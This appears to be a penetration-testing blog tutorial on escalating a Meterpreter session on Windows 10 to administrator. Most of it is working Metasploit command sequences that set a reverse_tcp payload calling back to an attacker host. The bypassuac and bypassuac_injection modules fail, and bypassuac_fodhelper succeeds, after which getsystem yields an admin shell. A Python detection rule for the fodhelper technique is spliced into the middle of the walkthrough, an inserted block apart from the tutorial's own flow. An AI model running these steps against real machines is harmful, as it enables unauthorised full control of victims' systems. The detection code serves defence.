Bypassing UAC in Windows 10

Utilizing Meterpreter we have started a session with our target machine. The machine is running Windows 10, and we need to gain administrator privileges.

If you try the usual getsystem command, it fails with an error. Usually you can use the bypassuac module, but I have found that this also fails, with a message that this version of Windows 10 is not vulnerable to this attack.

In this post we will look at how to get around the getsystem error and the bypassuac failure on Windows 10.

I will assume that you have already created your payload and initiated the reverse_tcp connection with the target machine. We are now connected and in the Meterpreter terminal.

Meterpreter connection with target

If we run getuid we can see the username we are logged in with.

getsystem attempts to gain administrator privileges for us, but fails.

getuid on Meterpreter

Usually at this point we could switch to using bypassuac to gain administrator privileges.

meterpreter > background
msf6 > use exploit/windows/local/bypassuac
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

The above commands background the open Meterpreter session, load the bypassuac module, set the payload and run the exploit. However, on Windows 10 it fails with the message:

[-] Exploit aborted due to failure: not-vulnerable: Windows 10 (10.0 Build 17763). is not vulnerable.

bypassuac fails on windows 10

Another option is the bypassuac_injection module.

msf6 > use exploit/windows/local/bypassuac_injection
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

When we run this, it fails with the error message:

[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System

bypassuac_injection fails on windows 10

If we switch back to our active session with sessions -i 1 and run getsystem again, we still get the same failure.

getsystem fails on windows 10

So what can we do on Windows 10 to get around this problem?

We can use the bypassuac_fodhelper module. Let's take a look at how it works.

msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

The result is that the Windows binary fodhelper.exe is used to spawn a new session in which UAC is bypassed.
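As a defender-side check added here (not part of the original post or of the Metasploit module), the following Python rule flags the two traces a fodhelper-based UAC bypass leaves in Sysmon-style telemetry: a write under the per-user ms-settings\Shell\Open\command registry key, which is the publicly documented mechanism fodhelper.exe auto-elevates through (not stated on this page), and a high-integrity child process spawned by fodhelper.exe. The event records and field names are constructed to mirror Sysmon's Event ID 13 (registry value set) and Event ID 1 (process create).

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style events for illustration (not captured from a real host).
# EventID 13 = registry value set, EventID 1 = process create.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "13", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-111\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute",
     "Details": ""},
    {"EventID": "13", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-111\Software\Classes\ms-settings\Shell\Open\command\(Default)",
     "Details": r"C:\Windows\System32\cmd.exe /c C:\Users\alice\AppData\Local\Temp\x.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "IntegrityLevel": "High", "User": "LAB\\alice"},
    # Benign activity that must not trigger an alert.
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium", "User": "LAB\\alice"},
]

# The key fodhelper.exe consults when auto-elevating; a write here by an
# unprivileged user is the setup step of the bypass.
MS_SETTINGS_KEY = re.compile(
    r"\\Software\\Classes\\ms-settings\\Shell\\Open\\command", re.IGNORECASE)


def detect_fodhelper_bypass(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs for events matching the fodhelper bypass pattern."""
    alerts: List[Tuple[str, str]] = []
    for e in events:
        # Rule 1: any value set under the per-user ms-settings command key.
        if e.get("EventID") == "13" and MS_SETTINGS_KEY.search(e.get("TargetObject", "")):
            alerts.append(("registry", e["TargetObject"]))
        # Rule 2: fodhelper.exe normally spawns no children; an elevated child
        # (High integrity) is the payload launched by the bypass.
        if (e.get("EventID") == "1"
                and e.get("ParentImage", "").lower().endswith("\\fodhelper.exe")
                and e.get("IntegrityLevel") == "High"):
            alerts.append(("process", e["Image"]))
    return alerts


if __name__ == "__main__":
    for rule, evidence in detect_fodhelper_bypass(EVENTS):
        print(f"[{rule}] {evidence}")
```

Rule 1 fires on the setup step, so it gives a detection opportunity before any elevated process exists; tune the process rule to your environment's legitimate use of optional-feature installs.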

bypassuac_fodhelper works on windows 10

You will now be back inside a Meterpreter session; sysinfo and getuid will both give the same details as before.

connected to windows 10 with Meterpreter

Now when you run getsystem it will be successful.

meterpreter > getsystem
meterpreter > getuid

getuid admin on windows 10

You now have full administrator access to the Windows 10 machine. If you execute the shell command, it gives you a command prompt with full administrator privileges.

start shell as admin on windows 10 with Meterpreter
